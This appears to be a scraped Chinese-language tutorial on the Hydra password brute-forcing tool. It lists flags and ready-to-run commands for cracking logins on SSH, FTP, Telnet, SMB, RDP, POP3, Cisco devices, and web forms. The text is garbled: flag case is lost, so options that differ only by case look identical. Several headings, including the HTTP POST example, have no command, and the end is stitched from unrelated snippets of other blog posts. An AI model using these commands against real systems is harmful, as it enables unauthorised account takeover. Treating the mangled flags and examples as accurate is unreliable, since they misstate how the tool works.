這個也是backtrack下面很受歡迎的乙個工具
引數詳解:
-r 根據上一次進度繼續破解
-s 使用ssl協議連線
-s 指定埠
-l 指定使用者名稱
-l 指定使用者名稱字典(檔案)
-p 指定密碼破解
-p 指定密碼字典(檔案)
-e 空密碼探測和指定使用者密碼探測(ns)
-c 使用者名稱可以用:分割(username:password)可以代替-l username -p password
-o 輸出檔案
-t 指定多執行緒數量,預設為16個執行緒
-vv 顯示詳細過程
server 目標ip
service 指定服務名(telnet ftp pop3 mssql mysql ssh ssh2......)
使用案例:
使用hydra破解ssh的密碼
hydra -l users.txt -p password.txt -vv -o ssh.log -e ns ip ssh
破解https:
破解teamspeak:
# hydra -l 使用者名稱 -p 密碼字典 -s 埠號 -vv ip teamspeak
破解cisco:
# hydra -p pass.txt ip cisco
# hydra -m cloud -p pass.txt 10.36.16.18 cisco-enable
破解smb:
# hydra -l administrator -p pass.txt ip smb
破解pop3:
# hydra -l muts -p pass.txt my.pop3.mail pop3
破解rdp:
# hydra ip rdp -l administrator -p pass.txt -v
破解http-proxy:
破解telnet
# hydra ip telnet -l 使用者 -p 密碼字典 -t 32 -s 23 -e ns -f -v
破解ftp:
# hydra ip ftp -l 使用者名稱 -p 密碼字典 -t 執行緒(預設16) -vv
# hydra ip ftp -l 使用者名稱 -p 密碼字典 -e ns -vv
get方式提交,破解web登入:
# hydra -l 使用者名稱 -p 密碼字典 -t 執行緒 -vv -e ns ip http-get /admin/
# hydra -l 使用者名稱 -p 密碼字典 -t 執行緒 -vv -e ns -f ip http-get /admin/index.php
post方式提交,破解web登入:
該軟體的強大之處就在於支援多種協議的破解,同樣也支援對於web使用者介面的登入破解,get方式提交的表單比較簡單,這裡通過post方式提交密碼破解提供思路。該工具有乙個不好的地方就是,如果目標**登入時候需要驗證碼就無法破解了。帶引數破解如下:
說明:破解的使用者名稱是admin,密碼字典是pass.lst,破解結果儲存在ok.lst,-t 是同時執行緒數為1,-f 是當破解了乙個密碼就停止,ip 是本地,就是目標ip,http-post-form表示破解是採用http 的post 方式提交的表單密碼破解。
後面引數是網頁中對應的表單字段的name 屬性,後面中的內容是表示錯誤猜解的返回資訊提示,可以自定義。
hydra 使用介紹
linux win2003 kali 檢視 hydra 幫助資訊 使用示例 examples hydra l user p passlist.txt hydra l userlist.txt p defaultpw imap hydra c defaults.txt 6 pop3s 2001 db8...
hydra簡單使用示例
本內容為網上收集整理,僅作為備忘!hydra簡單使用示例 破解https 破解teamspeak hydra l 使用者名稱 p 密碼字典 s 埠號 vv ip teamspeak 破解cisco hydra p pass.txt 10.36.16.18 cisco hydra m cloud p ...
使用Hydra爆破表單
部落格位址 github kali linux web靶機 github傳送門 靶機表單內容如下 表單截圖 假設網域名稱為host.com,表單路徑為 pikachu vul burteforce bf form.php 執行命令如下 hydra l admin p root rockyou.txt...